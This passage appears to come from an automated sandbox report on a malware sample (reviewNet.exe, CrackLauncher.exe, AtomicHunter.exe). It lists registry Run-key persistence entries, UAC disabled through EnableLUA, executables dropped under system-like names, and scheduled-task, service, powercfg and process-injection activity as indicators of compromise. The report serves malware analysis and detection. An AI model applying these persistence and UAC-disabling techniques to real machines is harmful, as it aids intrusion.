\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\AtomicHunter = "\"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\AtomicHunter.exe\"" reviewNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\reviewNet = "\"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\reviewNet.exe\"" reviewNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\reviewNet = "\"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\"" reviewNet.exe Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\CrackLauncher = "\"C:\\Program Files (x86)\\Windows NT\\TableTextService\\it-IT\\CrackLauncher.exe\"" reviewNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\reviewNet = "\"C:\\Users\\Public\\Downloads\\reviewNet.exe\"" reviewNet.exe Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Users\\Public\\Desktop\\conhost.exe\"" reviewNet.exe Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\CrackLauncher = "\"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Resource\\Linguistics\\CrackLauncher.exe\"" reviewNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\reviewNet = "\"C:\\Users\\Public\\reviewNet.exe\"" reviewNet.exe Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Program Files\\Reference Assemblies\\Microsoft\\conhost.exe\"" reviewNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Users\\Public\\Desktop\\conhost.exe\"" reviewNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\CrackLauncher = "\"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Resource\\Linguistics\\CrackLauncher.exe\"" reviewNet.exe Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\ComsurrogateServerdll\\cmd.exe\"" reviewNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\audiodg = "\"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\audiodg.exe\"" reviewNet.exe Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\wscript = "\"C:\\ComsurrogateServerdll\\wscript.exe\"" reviewNet.exe Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\"" reviewNet.exe Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\wininit = "\"C:\\Users\\Admin\\wininit.exe\"" reviewNet.exe Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\ComsurrogateServerdll\\conhost.exe\"" reviewNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wscript = "\"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\wscript.exe\"" reviewNet.exe Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\wscript = "\"C:\\ComsurrogateServerdll\\wscript.exe\"" reviewNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\ComsurrogateServerdll\\cmd.exe\"" reviewNet.exe Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\reviewNet = "\"C:\\Users\\Public\\Downloads\\reviewNet.exe\"" reviewNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\CrackLauncher = "\"C:\\Users\\Admin\\Pictures\\CrackLauncher.exe\"" reviewNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\CrackLauncher = "\"C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.Transactions.Bridge\\3.0.0.0__b03f5f7f11d50a3a\\CrackLauncher.exe\"" reviewNet.exe Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\CrackLauncher = "\"C:\\ComsurrogateServerdll\\CrackLauncher.exe\"" reviewNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\conhost.exe\"" reviewNet.exe Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\CrackLauncher = "\"C:\\ComsurrogateServerdll\\CrackLauncher.exe\"" reviewNet.exe Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\wscript = "\"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\wscript.exe\"" reviewNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\CrackLauncher = "\"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\CrackLauncher.exe\"" reviewNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\Program Files\\Uninstall Information\\cmd.exe\"" reviewNet.exe Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Users\\Default User\\conhost.exe\"" reviewNet.exe Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\Windows\\AppPatch\\cmd.exe\"" reviewNet.exe Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\conhost.exe\"" reviewNet.exe Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Users\\Admin\\Desktop\\conhost.exe\"" reviewNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\ComsurrogateServerdll\\conhost.exe\"" reviewNet.exe Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\Users\\Public\\Documents\\My Pictures\\cmd.exe\"" reviewNet.exe Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\conhost.exe\"" reviewNet.exe Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE = "\"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\"" reviewNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE = "\"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\"" reviewNet.exe Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\reviewNet = "\"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\"" reviewNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\CrackLauncher = "\"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\CrackLauncher.exe\"" reviewNet.exe Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\reviewNet = "\"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\reviewNet.exe\"" reviewNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\cmd.exe\"" reviewNet.exe Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\reviewNet = "\"C:\\Program Files (x86)\\Internet Explorer\\de-DE\\reviewNet.exe\"" reviewNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wscript = "\"C:\\ComsurrogateServerdll\\wscript.exe\"" reviewNet.exe Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\reviewNet = "\"C:\\Users\\Public\\reviewNet.exe\"" reviewNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OSPPSVC = "\"C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\OSPPSVC.exe\"" reviewNet.exe Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\CrackLauncher = "\"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\CrackLauncher.exe\"" reviewNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lsass = "\"C:\\Program Files\\Internet Explorer\\ja-JP\\lsass.exe\"" reviewNet.exe Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\Users\\Admin\\Videos\\cmd.exe\"" reviewNet.exe -
Processes:
reviewNet.exereviewNet.exereviewNet.exereviewNet.exereviewNet.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA reviewNet.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA reviewNet.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA reviewNet.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reviewNet.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA reviewNet.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA reviewNet.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reviewNet.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reviewNet.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reviewNet.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reviewNet.exe -
Power Settings 1 TTPs 10 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
Processes:
powercfg.execmd.exepowercfg.exepowercfg.exepowercfg.execmd.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepid process 4880 powercfg.exe 1040 cmd.exe 5424 powercfg.exe 8124 powercfg.exe 3052 powercfg.exe 4928 cmd.exe 5920 powercfg.exe 1308 powercfg.exe 4712 powercfg.exe 1728 powercfg.exe -
Drops file in Program Files directory 28 IoCs
Processes:
reviewNet.exereviewNet.exereviewNet.exereviewNet.exereviewNet.exedescription ioc process File created C:\Program Files (x86)\Microsoft.NET\RedistList\AtomicHunter.exe reviewNet.exe File created C:\Program Files (x86)\Microsoft.NET\RedistList\reviewNet.exe reviewNet.exe File created C:\Program Files\Reference Assemblies\Microsoft\088424020bedd6 reviewNet.exe File created C:\Program Files (x86)\MSBuild\Microsoft\07b979bd10a423 reviewNet.exe File created C:\Program Files (x86)\Windows NT\TableTextService\it-IT\CrackLauncher.exe reviewNet.exe File created C:\Program Files (x86)\Microsoft.NET\RedistList\07b979bd10a423 reviewNet.exe File created C:\Program Files (x86)\Microsoft.NET\RedistList\conhost.exe reviewNet.exe File created C:\Program Files (x86)\Microsoft.NET\RedistList\088424020bedd6 reviewNet.exe File created C:\Program Files (x86)\Microsoft.NET\RedistList\7fdd7c15684dda reviewNet.exe File created C:\Program Files\Uninstall Information\cmd.exe reviewNet.exe File created C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fr\conhost.exe reviewNet.exe File created C:\Program Files (x86)\Internet Explorer\de-DE\reviewNet.exe reviewNet.exe File opened for modification C:\Program Files\Uninstall Information\cmd.exe reviewNet.exe File created C:\Program Files\Uninstall Information\ebf1f9fa8afd6d reviewNet.exe File created C:\Program Files (x86)\Microsoft Visual Studio 8\SDK\7a8b3f7b9ee9a7 reviewNet.exe File created C:\Program Files (x86)\Google\Update\Offline\ebf1f9fa8afd6d reviewNet.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\CrackLauncher.exe reviewNet.exe File created C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fr\088424020bedd6 reviewNet.exe File created C:\Program Files\Internet Explorer\ja-JP\lsass.exe reviewNet.exe File created C:\Program Files\Internet Explorer\ja-JP\6203df4a6bafc7 reviewNet.exe File created C:\Program Files (x86)\Windows NT\TableTextService\it-IT\7a8b3f7b9ee9a7 reviewNet.exe File created C:\Program Files (x86)\Internet Explorer\de-DE\07b979bd10a423 reviewNet.exe File created C:\Program Files (x86)\Google\Update\Offline\cmd.exe reviewNet.exe File created C:\Program Files (x86)\MSBuild\Microsoft\reviewNet.exe reviewNet.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\7a8b3f7b9ee9a7 reviewNet.exe File created C:\Program Files\Reference Assemblies\Microsoft\conhost.exe reviewNet.exe File created C:\Program Files (x86)\Microsoft Visual Studio 8\SDK\CrackLauncher.exe reviewNet.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\CrackLauncher.exe reviewNet.exe -
Drops file in Windows directory 11 IoCs
Processes:
reviewNet.exereviewNet.exereviewNet.exedescription ioc process File created C:\Windows\AppPatch\cmd.exe reviewNet.exe File created C:\Windows\Fonts\7a8b3f7b9ee9a7 reviewNet.exe File created C:\Windows\DigitalLocker\es-ES\cmd.exe reviewNet.exe File created C:\Windows\Boot\Fonts\CrackLauncher.exe reviewNet.exe File created C:\Windows\Fonts\CrackLauncher.exe reviewNet.exe File created C:\Windows\assembly\GAC_MSIL\Microsoft.Transactions.Bridge\3.0.0.0__b03f5f7f11d50a3a\CrackLauncher.exe reviewNet.exe File created C:\Windows\assembly\GAC_MSIL\Microsoft.Transactions.Bridge\3.0.0.0__b03f5f7f11d50a3a\7a8b3f7b9ee9a7 reviewNet.exe File created C:\Windows\SoftwareDistribution\DataStore\smss.exe reviewNet.exe File created C:\Windows\SoftwareDistribution\DataStore\69ddcba757bf72 reviewNet.exe File created C:\Windows\DigitalLocker\es-ES\ebf1f9fa8afd6d reviewNet.exe File created C:\Windows\AppPatch\ebf1f9fa8afd6d reviewNet.exe -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 5956 sc.exe 4032 sc.exe 2504 sc.exe 1504 sc.exe 7436 sc.exe 3680 sc.exe 3260 sc.exe 3232 sc.exe 2104 sc.exe 6904 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Scheduled Task/Job: Scheduled Task 1 TTPs 64 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 6428 schtasks.exe 6448 schtasks.exe 5656 schtasks.exe 4036 schtasks.exe 5532 schtasks.exe 948 schtasks.exe 4024 schtasks.exe 6092 schtasks.exe 5760 schtasks.exe 4608 schtasks.exe 6564 schtasks.exe 4524 schtasks.exe 3256 schtasks.exe 5916 schtasks.exe 4760 schtasks.exe 5660 schtasks.exe 3964 schtasks.exe 4056 schtasks.exe 5192 schtasks.exe 5280 schtasks.exe 5788 schtasks.exe 4436 schtasks.exe 768 schtasks.exe 2900 schtasks.exe 5204 schtasks.exe 3876 schtasks.exe 5984 schtasks.exe 6132 schtasks.exe 5212 schtasks.exe 3480 schtasks.exe 1288 schtasks.exe 6860 schtasks.exe 3404 schtasks.exe 5132 schtasks.exe 5816 schtasks.exe 3136 schtasks.exe 3112 schtasks.exe 1816 schtasks.exe 6720 schtasks.exe 3336 schtasks.exe 3688 schtasks.exe 4844 schtasks.exe 7148 schtasks.exe 3236 schtasks.exe 4648 schtasks.exe 5332 schtasks.exe 4564 schtasks.exe 5176 schtasks.exe 6116 schtasks.exe 5836 schtasks.exe 5884 schtasks.exe 2112 schtasks.exe 2200 schtasks.exe 4220 schtasks.exe 3452 schtasks.exe 5944 schtasks.exe 3680 schtasks.exe 2308 schtasks.exe 912 schtasks.exe 5396 schtasks.exe 4076 schtasks.exe 5352 schtasks.exe 5576 schtasks.exe 3332 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
reviewNet.exereviewNet.exereviewNet.exereviewNet.exereviewNet.exepid process 1508 reviewNet.exe 660 reviewNet.exe 2248 reviewNet.exe 2636 reviewNet.exe 1040 reviewNet.exe 1508 reviewNet.exe 1508 reviewNet.exe 1508 reviewNet.exe 1508 reviewNet.exe 1508 reviewNet.exe 1508 reviewNet.exe 1508 reviewNet.exe 1508 reviewNet.exe 1508 reviewNet.exe 1508 reviewNet.exe 660 reviewNet.exe 660 reviewNet.exe 660 reviewNet.exe 660 reviewNet.exe 660 reviewNet.exe 660 reviewNet.exe 660 reviewNet.exe 660 reviewNet.exe 660 reviewNet.exe 660 reviewNet.exe 1508 reviewNet.exe 1508 reviewNet.exe 1508 reviewNet.exe 1508 reviewNet.exe 1508 reviewNet.exe 660 reviewNet.exe 660 reviewNet.exe 660 reviewNet.exe 660 reviewNet.exe 660 reviewNet.exe 2636 reviewNet.exe 2636 reviewNet.exe 2636 reviewNet.exe 2636 reviewNet.exe 2636 reviewNet.exe 1040 reviewNet.exe 1040 reviewNet.exe 1040 reviewNet.exe 1040 reviewNet.exe 1040 reviewNet.exe 1040 reviewNet.exe 660 reviewNet.exe 660 reviewNet.exe 660 reviewNet.exe 660 reviewNet.exe 660 reviewNet.exe 660 reviewNet.exe 660 reviewNet.exe 660 reviewNet.exe 660 reviewNet.exe 660 reviewNet.exe 660 reviewNet.exe 660 reviewNet.exe 1508 reviewNet.exe 1508 reviewNet.exe 1508 reviewNet.exe 1508 reviewNet.exe 1508 reviewNet.exe 1508 reviewNet.exe -
Suspicious use of AdjustPrivilegeToken 39 IoCs
Processes:
reviewNet.exereviewNet.exereviewNet.exereviewNet.exereviewNet.exereviewNet.exereviewNet.exereviewNet.exereviewNet.exereviewNet.exereviewNet.exereviewNet.exereviewNet.exereviewNet.exereviewNet.exereviewNet.exereviewNet.exereviewNet.exereviewNet.exereviewNet.exereviewNet.exereviewNet.exereviewNet.exereviewNet.exereviewNet.exereviewNet.exereviewNet.exereviewNet.exereviewNet.exereviewNet.exereviewNet.exereviewNet.exereviewNet.exereviewNet.exereviewNet.exereviewNet.exereviewNet.exereviewNet.exereviewNet.exedescription pid process Token: SeDebugPrivilege 2248 reviewNet.exe Token: SeDebugPrivilege 660 reviewNet.exe Token: SeDebugPrivilege 2636 reviewNet.exe Token: SeDebugPrivilege 1040 reviewNet.exe Token: SeDebugPrivilege 1508 reviewNet.exe Token: SeDebugPrivilege 2388 reviewNet.exe Token: SeDebugPrivilege 2616 reviewNet.exe Token: SeDebugPrivilege 1560 reviewNet.exe Token: SeDebugPrivilege 1600 reviewNet.exe Token: SeDebugPrivilege 1960 reviewNet.exe Token: SeDebugPrivilege 4012 reviewNet.exe Token: SeDebugPrivilege 2028 reviewNet.exe Token: SeDebugPrivilege 2216 reviewNet.exe Token: SeDebugPrivilege 3348 reviewNet.exe Token: SeDebugPrivilege 3672 reviewNet.exe Token: SeDebugPrivilege 3484 reviewNet.exe Token: SeDebugPrivilege 3360 reviewNet.exe Token: SeDebugPrivilege 1636 reviewNet.exe Token: SeDebugPrivilege 2200 reviewNet.exe Token: SeDebugPrivilege 2332 reviewNet.exe Token: SeDebugPrivilege 1492 reviewNet.exe Token: SeDebugPrivilege 3352 reviewNet.exe Token: SeDebugPrivilege 2000 reviewNet.exe Token: SeDebugPrivilege 5060 reviewNet.exe Token: SeDebugPrivilege 5012 reviewNet.exe Token: SeDebugPrivilege 5020 reviewNet.exe Token: SeDebugPrivilege 5004 reviewNet.exe Token: SeDebugPrivilege 5040 reviewNet.exe Token: SeDebugPrivilege 5028 reviewNet.exe Token: SeDebugPrivilege 5048 reviewNet.exe Token: SeDebugPrivilege 5436 reviewNet.exe Token: SeDebugPrivilege 5408 reviewNet.exe Token: SeDebugPrivilege 3444 reviewNet.exe Token: SeDebugPrivilege 4340 reviewNet.exe Token: SeDebugPrivilege 5628 reviewNet.exe Token: SeDebugPrivilege 2568 reviewNet.exe Token: SeDebugPrivilege 6772 reviewNet.exe Token: SeDebugPrivilege 6840 reviewNet.exe Token: SeDebugPrivilege 7152 reviewNet.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
CrackLauncher.exeCrackLauncher.exeCrackLauncher.exeCrackLauncher.exeCrackLauncher.exeAtomicHunter.exedescription pid process target process PID 2848 wrote to memory of 2204 2848 CrackLauncher.exe CrackLauncher.exe PID 2848 wrote to memory of 2204 2848 CrackLauncher.exe CrackLauncher.exe PID 2848 wrote to memory of 2204 2848 CrackLauncher.exe CrackLauncher.exe PID 2848 wrote to memory of 2204 2848 CrackLauncher.exe CrackLauncher.exe PID 2848 wrote to memory of 2204 2848 CrackLauncher.exe CrackLauncher.exe PID 2848 wrote to memory of 2204 2848 CrackLauncher.exe CrackLauncher.exe PID 2848 wrote to memory of 2204 2848 CrackLauncher.exe CrackLauncher.exe PID 2848 wrote to memory of 2148 2848 CrackLauncher.exe AtomicHunter.exe PID 2848 wrote to memory of 2148 2848 CrackLauncher.exe AtomicHunter.exe PID 2848 wrote to memory of 2148 2848 CrackLauncher.exe AtomicHunter.exe PID 2848 wrote to memory of 2148 2848 CrackLauncher.exe AtomicHunter.exe PID 2848 wrote to memory of 2148 2848 CrackLauncher.exe AtomicHunter.exe PID 2848 wrote to memory of 2148 2848 CrackLauncher.exe AtomicHunter.exe PID 2848 wrote to memory of 2148 2848 CrackLauncher.exe AtomicHunter.exe PID 2204 wrote to memory of 2756 2204 CrackLauncher.exe CrackLauncher.exe PID 2204 wrote to memory of 2756 2204 CrackLauncher.exe CrackLauncher.exe PID 2204 wrote to memory of 2756 2204 CrackLauncher.exe CrackLauncher.exe PID 2204 wrote to memory of 2756 2204 CrackLauncher.exe CrackLauncher.exe PID 2204 wrote to memory of 2756 2204 CrackLauncher.exe CrackLauncher.exe PID 2204 wrote to memory of 2756 2204 CrackLauncher.exe CrackLauncher.exe PID 2204 wrote to memory of 2756 2204 CrackLauncher.exe CrackLauncher.exe PID 2204 wrote to memory of 2944 2204 CrackLauncher.exe AtomicHunter.exe PID 2204 wrote to memory of 2944 2204 CrackLauncher.exe AtomicHunter.exe PID 2204 wrote to memory of 2944 2204 CrackLauncher.exe AtomicHunter.exe PID 2204 wrote to memory of 2944 2204 CrackLauncher.exe AtomicHunter.exe PID 2204 wrote to memory of 2944 2204 CrackLauncher.exe AtomicHunter.exe PID 2204 wrote to memory of 2944 2204 CrackLauncher.exe AtomicHunter.exe PID 2204 wrote to memory of 2944 2204 CrackLauncher.exe AtomicHunter.exe PID 2756 wrote to memory of 2932 2756 CrackLauncher.exe CrackLauncher.exe PID 2756 wrote to memory of 2932 2756 CrackLauncher.exe CrackLauncher.exe PID 2756 wrote to memory of 2932 2756 CrackLauncher.exe CrackLauncher.exe PID 2756 wrote to memory of 2932 2756 CrackLauncher.exe CrackLauncher.exe PID 2756 wrote to memory of 2932 2756 CrackLauncher.exe CrackLauncher.exe PID 2756 wrote to memory of 2932 2756 CrackLauncher.exe CrackLauncher.exe PID 2756 wrote to memory of 2932 2756 CrackLauncher.exe CrackLauncher.exe PID 2756 wrote to memory of 2692 2756 CrackLauncher.exe AtomicHunter.exe PID 2756 wrote to memory of 2692 2756 CrackLauncher.exe AtomicHunter.exe PID 2756 wrote to memory of 2692 2756 CrackLauncher.exe AtomicHunter.exe PID 2756 wrote to memory of 2692 2756 CrackLauncher.exe AtomicHunter.exe PID 2756 wrote to memory of 2692 2756 CrackLauncher.exe AtomicHunter.exe PID 2756 wrote to memory of 2692 2756 CrackLauncher.exe AtomicHunter.exe PID 2756 wrote to memory of 2692 2756 CrackLauncher.exe AtomicHunter.exe PID 2932 wrote to memory of 2580 2932 CrackLauncher.exe CrackLauncher.exe PID 2932 wrote to memory of 2580 2932 CrackLauncher.exe CrackLauncher.exe PID 2932 wrote to memory of 2580 2932 CrackLauncher.exe CrackLauncher.exe PID 2932 wrote to memory of 2580 2932 CrackLauncher.exe CrackLauncher.exe PID 2932 wrote to memory of 2580 2932 CrackLauncher.exe CrackLauncher.exe PID 2932 wrote to memory of 2580 2932 CrackLauncher.exe CrackLauncher.exe PID 2932 wrote to memory of 2580 2932 CrackLauncher.exe CrackLauncher.exe PID 2932 wrote to memory of 2724 2932 CrackLauncher.exe AtomicHunter.exe PID 2932 wrote to memory of 2724 2932 CrackLauncher.exe AtomicHunter.exe PID 2932 wrote to memory of 2724 2932 CrackLauncher.exe AtomicHunter.exe PID 2932 wrote to memory of 2724 2932 CrackLauncher.exe AtomicHunter.exe PID 2932 wrote to memory of 2724 2932 CrackLauncher.exe AtomicHunter.exe PID 2932 wrote to memory of 2724 2932 CrackLauncher.exe AtomicHunter.exe PID 2932 wrote to memory of 2724 2932 CrackLauncher.exe AtomicHunter.exe PID 2580 wrote to memory of 3012 2580 CrackLauncher.exe CrackLauncher.exe PID 2580 wrote to memory of 3012 2580 CrackLauncher.exe CrackLauncher.exe PID 2580 wrote to memory of 3012 2580 CrackLauncher.exe CrackLauncher.exe PID 2580 wrote to memory of 3012 2580 CrackLauncher.exe CrackLauncher.exe PID 2580 wrote to memory of 3012 2580 CrackLauncher.exe CrackLauncher.exe PID 2580 wrote to memory of 3012 2580 CrackLauncher.exe CrackLauncher.exe PID 2580 wrote to memory of 3012 2580 CrackLauncher.exe CrackLauncher.exe PID 2724 wrote to memory of 3008 2724 AtomicHunter.exe schtasks.exe -
System policy modification 1 TTPs 15 IoCs
Processes:
